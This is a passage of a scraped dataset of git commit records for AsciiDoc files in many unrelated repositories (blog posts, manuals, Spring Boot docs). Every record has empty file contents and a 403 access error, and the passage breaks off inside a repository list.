2014-08-14-Episode-10-Pinball-Galore.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2014-08-14-Episode-10-Pinball-Galore.adoc","new_file":"_posts\/2014-08-14-Episode-10-Pinball-Galore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1104758a52a663d2c9c93ee91ec743bc93719df2","subject":"Update 2015-02-16-Getting-started-with-Hubpress.adoc","message":"Update 2015-02-16-Getting-started-with-Hubpress.adoc","repos":"alchapone\/alchapone.github.io,alchapone\/alchapone.github.io,alchapone\/alchapone.github.io","old_file":"_posts\/2015-02-16-Getting-started-with-Hubpress.adoc","new_file":"_posts\/2015-02-16-Getting-started-with-Hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alchapone\/alchapone.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d272931d4012266f680699ce3de6920e03059987","subject":"Remove submodules configuration","message":"Remove submodules configuration","repos":"uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"99a4954e55e73234842470f1469f740da5af7ed5","subject":"Update 2016-02-04-Merge-vs-Rebase-in-Git.adoc","message":"Update 2016-02-04-Merge-vs-Rebase-in-Git.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-02-04-Merge-vs-Rebase-in-Git.adoc","new_file":"_posts\/2016-02-04-Merge-vs-Rebase-in-Git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38dc496b9c5d8c1ab8071ac5dfb7d3f3c0dd0dbf","subject":"Update 2017-02-21-2.adoc","message":"Update 2017-02-21-2.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21-2.adoc","new_file":"_posts\/2017-02-21-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad916b0850a2e548194b1f47ce009c7f738135f2","subject":"chore(promise-resolve): \u6587\u7ae0\u304c\u5bfe\u3068\u306a\u308b\u3088\u3046\u306b","message":"chore(promise-resolve): \u6587\u7ae0\u304c\u5bfe\u3068\u306a\u308b\u3088\u3046\u306b\n\n\u3000\nfixes #73\n","repos":"dieface\/promises-book,oToUC\/promises-book,dieface\/promises-book,oToUC\/promises-book,azu\/promises-book,genie88\/promises-book,wenber\/promises-book,tangjinzhou\/promises-book,azu\/promises-book,wangwei1237\/promises-book,charlenopires\/promises-book,lidasong2014\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,xifeiwu\/promises-book,cqricky\/promises-book,charlenopires\/promises-book,cqricky\/promises-book,xifeiwu\/promises-book,cqricky\/promises-book,liyunsheng\/promises-book,wenber\/promises-book,liyunsheng\/promises-book,purepennons\/promises-book,purepennons\/promises-book,sunfurong\/promise,liyunsheng\/promises-book,purepennons\/promises-book,genie88\/promises-book,tangjinzhou\/promises-book,wangwei1237\/promises-book,sunfurong\/promise,liubin\/promises-book,wangwei1237\/promises-book,mzbac\/promises-book,mzbac\/promises-book,genie88\/promises-book,liubin\/promises-book,tangjinzhou\/promises-book,mzbac\/promises-book,xifeiwu\/promises-book,wenber\/promises-book,liubin\/promises-book,sunfurong\/promise,lidasong2014\/promises-book,oToUC\/promises-book,charlenopires\/promises-book,azu\/promises-book,azu\/promises-book","old_file":"Ch2_HowToWrite\/promise-resolve.adoc","new_file":"Ch2_HowToWrite\/promise-resolve.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad905bbde77811053baf7d71c4eadd3396f82497","subject":"Update 2015-02-12-a.adoc","message":"Update 2015-02-12-a.adoc","repos":"hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress","old_file":"_posts\/2015-02-12-a.adoc","new_file":"_posts\/2015-02-12-a.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hinaloe\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"10932d0c8f6e072af256491a386a3c4d5f509389","subject":"Update 2016-04-07-A.adoc","message":"Update 2016-04-07-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-A.adoc","new_file":"_posts\/2016-04-07-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fbb870b4550f2d5a46cc659deba2c63f7ffc79b5","subject":"Updated AUTHORS.adoc","message":"Updated AUTHORS.adoc","repos":"justhackit\/javaanpr,adi9090\/javaanpr,adi9090\/javaanpr,justhackit\/javaanpr,joshuagn\/ANPR,joshuagn\/ANPR","old_file":"AUTHORS.adoc","new_file":"AUTHORS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshuagn\/ANPR.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c5ce2938d10862f4ba3909b0423c17c656a478ce","subject":"Added IoCs for TeleBots","message":"Added IoCs for TeleBots\n","repos":"eset\/malware-ioc,eset\/malware-ioc","old_file":"telebots\/README.adoc","new_file":"telebots\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-ioc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"2981fd53e91fe7320219d63b0078f009a8d10130","subject":"Changing branching system","message":"Changing branching system\n","repos":"justhackit\/javaanpr,joshuagn\/ANPR,adi9090\/javaanpr,joshuagn\/ANPR,adi9090\/javaanpr,justhackit\/javaanpr","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshuagn\/ANPR.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"89b60f70327ea3987bd40f61802d61e161a351a1","subject":"Adds ReadMe file to repository","message":"Adds ReadMe file to repository\n","repos":"rajadileepkolli\/POC,rajadileepkolli\/POC,rajadileepkolli\/POC,rajadileepkolli\/POC","old_file":"ReadMe.adoc","new_file":"ReadMe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rajadileepkolli\/POC.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0b98abedfa739afc8eefcb205205b4c4eff505c6","subject":"Update 2015-09-06-.adoc","message":"Update 2015-09-06-.adoc","repos":"suning-wireless\/Suning-Wireless.github.io,suning-wireless\/Suning-Wireless.github.io,suning-wireless\/Suning-Wireless.github.io","old_file":"_posts\/2015-09-06-.adoc","new_file":"_posts\/2015-09-06-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/suning-wireless\/Suning-Wireless.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"10ec4c28ea16dd1afc6001e6cd738dc5bc48e37f","subject":"Publish 2017-02-25adocadoc-part-1.adoc","message":"Publish 2017-02-25adocadoc-part-1.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"2017-02-25adocadoc-part-1.adoc","new_file":"2017-02-25adocadoc-part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0575128f7cd4c48718548a5a9fa8b91fdff11467","subject":"y2b create post 65\\","message":"y2b create post 65\\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-22-65.adoc","new_file":"_posts\/2013-05-22-65.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04a306d5cc935905861426ca27f2a233128a9efa","subject":"linking to Compose file","message":"linking to Compose file\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a4b143fbb4ad1f2faf2a81922cb4873746d36065","subject":"Update 2016-03-03-Playing-with-Source-Maps.adoc","message":"Update 2016-03-03-Playing-with-Source-Maps.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2016-03-03-Playing-with-Source-Maps.adoc","new_file":"_posts\/2016-03-03-Playing-with-Source-Maps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91e14b9516f891ce27811940fd05ddc11602429d","subject":"Update 2016-05-16-blabla-1-2-3.adoc","message":"Update 2016-05-16-blabla-1-2-3.adoc","repos":"sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io","old_file":"_posts\/2016-05-16-blabla-1-2-3.adoc","new_file":"_posts\/2016-05-16-blabla-1-2-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sgalles\/sgalles.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1735c814fe9ae5e110410303f6b00014c24264dd","subject":"Update 2017-08-03-sed-add-plus.adoc","message":"Update 2017-08-03-sed-add-plus.adoc","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2017-08-03-sed-add-plus.adoc","new_file":"_posts\/2017-08-03-sed-add-plus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69665fcbce5bb9208bae6970ed70aab509d0db16","subject":"Update 2014-09-19-Apologizing-for-exuberance.adoc","message":"Update 2014-09-19-Apologizing-for-exuberance.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-09-19-Apologizing-for-exuberance.adoc","new_file":"_posts\/2014-09-19-Apologizing-for-exuberance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7afcf24a2f80b00c85965ab70333a9cacea8ba00","subject":"Gf \u21d2 GF","message":"Gf \u21d2 GF\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"DB from Eclipse.adoc","new_file":"DB from Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f36e216264800d9a1fc61329e0f67042ea6be5db","subject":"Update 2012-04-20-Enabling-SOAP-message-signing-for-EJB-webservice-client-in-Glassfish.adoc","message":"Update 2012-04-20-Enabling-SOAP-message-signing-for-EJB-webservice-client-in-Glassfish.adoc","repos":"pdudits\/hubpress,pdudits\/hubpress,pdudits\/pdudits.github.io,pdudits\/hubpress,pdudits\/hubpress,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io","old_file":"_posts\/2012-04-20-Enabling-SOAP-message-signing-for-EJB-webservice-client-in-Glassfish.adoc","new_file":"_posts\/2012-04-20-Enabling-SOAP-message-signing-for-EJB-webservice-client-in-Glassfish.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d45f6c4025196cc4bcb5e8afd67d5bf6a6039b46","subject":"Update 2016-6-25-Git-one.adoc","message":"Update 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-25-Git-one.adoc","new_file":"_posts\/2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d6742d1360379ad8b08cd1d7cd752e1e0376bb5","subject":"Update 2017-12-08-Go-O-R.adoc","message":"Update 2017-12-08-Go-O-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-Go-O-R.adoc","new_file":"_posts\/2017-12-08-Go-O-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6bbb736d8f91d2bb3ccc817d9d33fdae4662094","subject":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","message":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","repos":"shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io","old_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shinchiro\/shinchiro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39da78be4e78876d964f2fa1aa8a56ff9d44dc5f","subject":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f56258642166a8df368aa04bcad41140ebeaba59","subject":"Update 2015-08-04-Writting-macro-with-Asciidoctor.adoc","message":"Update 2015-08-04-Writting-macro-with-Asciidoctor.adoc","repos":"gscheibel\/blog,gscheibel\/blog,gscheibel\/blog","old_file":"_posts\/2015-08-04-Writting-macro-with-Asciidoctor.adoc","new_file":"_posts\/2015-08-04-Writting-macro-with-Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gscheibel\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4109d10146f7bae42c8f47cf90e57c0697e72a3","subject":"Delete 2017-08-14-Azure-6.adoc","message":"Delete 2017-08-14-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-14-Azure-6.adoc","new_file":"_posts\/2017-08-14-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b494a58f5fb408cbfa260ae33bd24254615ffa43","subject":"Update 2015-09-17-first-commit.adoc","message":"Update 2015-09-17-first-commit.adoc","repos":"popurax\/popurax.github.io,popurax\/popurax.github.io,popurax\/popurax.github.io","old_file":"_posts\/2015-09-17-first-commit.adoc","new_file":"_posts\/2015-09-17-first-commit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/popurax\/popurax.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14228ba5100d136c01c8eb5a11d8d8d9ddbd1e22","subject":"Update 2017-10-27-Go-lang-memo.adoc","message":"Update 2017-10-27-Go-lang-memo.adoc","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2017-10-27-Go-lang-memo.adoc","new_file":"_posts\/2017-10-27-Go-lang-memo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"673a4b6bdb7e7d451250ba76c4aead3dec291f56","subject":"y2b create post The Best Bluetooth Speaker?","message":"y2b create post The Best Bluetooth Speaker?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-08-02-The-Best-Bluetooth-Speaker.adoc","new_file":"_posts\/2015-08-02-The-Best-Bluetooth-Speaker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"260d4bb343f491e846f8d05460d2db275124f57c","subject":"y2b create post 5 Crazy Things At CES 2016","message":"y2b create post 5 Crazy Things At CES 2016","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-01-12-5-Crazy-Things-At-CES-2016.adoc","new_file":"_posts\/2016-01-12-5-Crazy-Things-At-CES-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"426ad8eb87ef623c3279074581b921a1981fc090","subject":"Update 2016-02-12-The-start.adoc","message":"Update 2016-02-12-The-start.adoc","repos":"jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io","old_file":"_posts\/2016-02-12-The-start.adoc","new_file":"_posts\/2016-02-12-The-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jblemee\/jblemee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ed421dbd3f87c6f0ccb6b23f5c7d2f30c38c5c3","subject":"Update 2017-04-14-Test-Post.adoc","message":"Update 2017-04-14-Test-Post.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-04-14-Test-Post.adoc","new_file":"_posts\/2017-04-14-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/roobyz\/roobyz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe58c29015875866060a6aa07ffb1ab844081b5b","subject":"Update 03_task_publishToConfluence.adoc","message":"Update 03_task_publishToConfluence.adoc\n\nFix spelling error","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain","old_file":"src\/docs\/manual\/03_task_publishToConfluence.adoc","new_file":"src\/docs\/manual\/03_task_publishToConfluence.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f48c0f974b58238683f8838ceea8d99dc724c877","subject":"Fix grid column sort order documentation (#8650)","message":"Fix grid column sort order documentation (#8650)\n\n* Fix grid column sort order documentation\n","repos":"mstahv\/framework,mstahv\/framework,Darsstar\/framework,Darsstar\/framework,asashour\/framework,Darsstar\/framework,Darsstar\/framework,kironapublic\/vaadin,peterl1084\/framework,kironapublic\/vaadin,kironapublic\/vaadin,mstahv\/framework,asashour\/framework,mstahv\/framework,peterl1084\/framework,peterl1084\/framework,kironapublic\/vaadin,peterl1084\/framework,kironapublic\/vaadin,asashour\/framework,mstahv\/framework,Darsstar\/framework,peterl1084\/framework,asashour\/framework,asashour\/framework","old_file":"documentation\/components\/components-grid.asciidoc","new_file":"documentation\/components\/components-grid.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/peterl1084\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"02026cb9dc7555488c0669dcc9f1f11b39d24529","subject":"Updated table in single node document.","message":"Updated table in single node document.\n","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/single_node_sw.adoc","new_file":"docs\/single_node_sw.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0834bd36c213c73baac32f0b9741dc65cb28a63f","subject":"Update 2010-12-04-Ways-to-Reduce-Paper-Reliance-Through-Technology.adoc","message":"Update 2010-12-04-Ways-to-Reduce-Paper-Reliance-Through-Technology.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"_posts\/2010-12-04-Ways-to-Reduce-Paper-Reliance-Through-Technology.adoc","new_file":"_posts\/2010-12-04-Ways-to-Reduce-Paper-Reliance-Through-Technology.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e99ba90045f96502d1715894eeeeac6050819c2","subject":"Polish contribution","message":"Polish contribution\n\nI don't think we want to keep this on a single line.\n\nCloses gh-4309\n","repos":"ihoneymon\/spring-boot,sbuettner\/spring-boot,srikalyan\/spring-boot,ptahchiev\/spring-boot,tiarebalbi\/spring-boot,htynkn\/spring-boot,linead\/spring-boot,sbcoba\/spring-boot,joshiste\/spring-boot,ameraljovic\/spring-boot,lexandro\/spring-boot,philwebb\/spring-boot-concourse,linead\/spring-boot,sebastiankirsch\/spring-boot,joshiste\/spring-boot,jayarampradhan\/spring-boot,mbenson\/spring-boot,brettwooldridge\/spring-boot,DeezCashews\/spring-boot,sbcoba\/spring-boot,afroje-reshma\/spring-boot-sample,habuma\/spring-boot,zhanhb\/spring-boot,mrumpf\/spring-boot,mdeinum\/spring-boot,DeezCashews\/spring-boot,philwebb\/spring-boot-concourse,bbrouwer\/spring-boot,pvorb\/spring-boot,spring-projects\/spring-boot,dfa1\/spring-boot,mosoft521\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,yhj630520\/spring-boot,afroje-reshma\/spring-boot-sample,brettwooldridge\/spring-boot,thomasdarimont\/spring-boot,ilayaperumalg\/spring-boot,mdeinum\/spring-boot,NetoDevel\/spring-boot,neo4j-contrib\/spring-boot,wilkinsona\/spring-boot,chrylis\/spring-boot,isopov\/spring-boot,candrews\/spring-boot,minmay\/spring-boot,NetoDevel\/spring-boot,dfa1\/spring-boot,lexandro\/spring-boot,sbcoba\/spring-boot,ihoneymon\/spring-boot,deki\/spring-boot,dreis2211\/spring-boot,mdeinum\/spring-boot,deki\/spring-boot,zhanhb\/spring-boot,bbrouwer\/spring-boot,Nowheresly\/spring-boot,yangdd1205\/spring-boot,donhuvy\/spring-boot,javyzheng\/spring-boot,vakninr\/spring-boot,kdvolder\/spring-boot,tiarebalbi\/spring-boot,aahlenst\/spring-boot,hqrt\/jenkins2-course-spring-boot,deki\/spring-boot,sbuettner\/spring-boot,sebastiankirsch\/spring-boot,jxblum\/spring-boot,kdvolder\/spring-boot,zhanhb\/spring-boot,RichardCSantana\/spring-boot,ihoneymon\/spring-boot,xiaoleiPENG\/my-project,vpavic\/spring-boot,mbogoevici\/spring-boot,neo4j-contrib\/spring-boot,aahlenst\/spring-boot,habuma\/spring-boot,herau\/spring-boot,lburgazzoli\/spring-boot,i007422\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,Nowheresly\/spring-boot,lburgazzoli\/spring-boot,SaravananParthasarathy\/SPSDemo,afroje-reshma\/spring-boot-sample,ollie314\/spring-boot,zhangshuangquan\/spring-root,kamilszymanski\/spring-boot,dfa1\/spring-boot,bbrouwer\/spring-boot,isopov\/spring-boot,NetoDevel\/spring-boot,javyzheng\/spring-boot,izeye\/spring-boot,cleverjava\/jenkins2-course-spring-boot,DeezCashews\/spring-boot,RichardCSantana\/spring-boot,herau\/spring-boot,akmaharshi\/jenkins,mosoft521\/spring-boot,qerub\/spring-boot,NetoDevel\/spring-boot,habuma\/spring-boot,zhanhb\/spring-boot,NetoDevel\/spring-boot,jvz\/spring-boot,felipeg48\/spring-boot,mbenson\/spring-boot,hello2009chen\/spring-boot,habuma\/spring-boot,isopov\/spring-boot,hqrt\/jenkins2-course-spring-boot,joshthornhill\/spring-boot,spring-projects\/spring-boot,jbovet\/spring-boot,jvz\/spring-boot,lburgazzoli\/spring-boot,dreis2211\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,mdeinum\/spring-boot,bjornlindstrom\/spring-boot,thomasdarimont\/spring-boot,ollie314\/spring-boot,joshthornhill\/spring-boot,RichardCSantana\/spring-boot,jbovet\/spring-boot,felipeg48\/spring-boot,nebhale\/spring-boot,mbenson\/spring-boot,olivergierke\/spring-boot,philwebb\/spring-boot,olivergierke\/spring-boot,kamilszymanski\/spring-boot,jmnarloch\/spring-boot,srikalyan\/spring-boot,aahlenst\/spring-boot,joshiste\/spring-boot,akmaharshi\/jenkins,cleverjava\/jenkins2-course-spring-boot,chrylis\/spring-boot,spring-projects\/spring-boot,drumonii\/spring-boot,bijukunjummen\/spring-boot,michael-simons\/spring-boot,dfa1\/spring-boot,SaravananParthasarathy\/SPSDemo,joshthornhill\/spring-boot,ilayaperumalg\/spring-boot,hqrt\/jenkins2-course-spring-boot,candrews\/spring-boot,i007422\/jenkins2-course-spring-boot,mbenson\/spring-boot,jvz\/spring-boot,wilkinsona\/spring-boot,qerub\/spring-boot,minmay\/spring-boot,pvorb\/spring-boot,michael-simons\/spring-boot,javyzheng\/spring-boot,mrumpf\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,joshiste\/spring-boot,kdvolder\/spring-boot,wilkinsona\/spring-boot,michael-simons\/spring-boot,lexandro\/spring-boot,izeye\/spring-boot,nebhale\/spring-boot,jbovet\/spring-boot,sbuettner\/spring-boot,qerub\/spring-boot,bijukunjummen\/spring-boot,bjornlindstrom\/spring-boot,aahlenst\/spring-boot,lenicliu\/spring-boot,minmay\/spring-boot,htynkn\/spring-boot,wilkinsona\/spring-boot,drumonii\/spring-boot,ila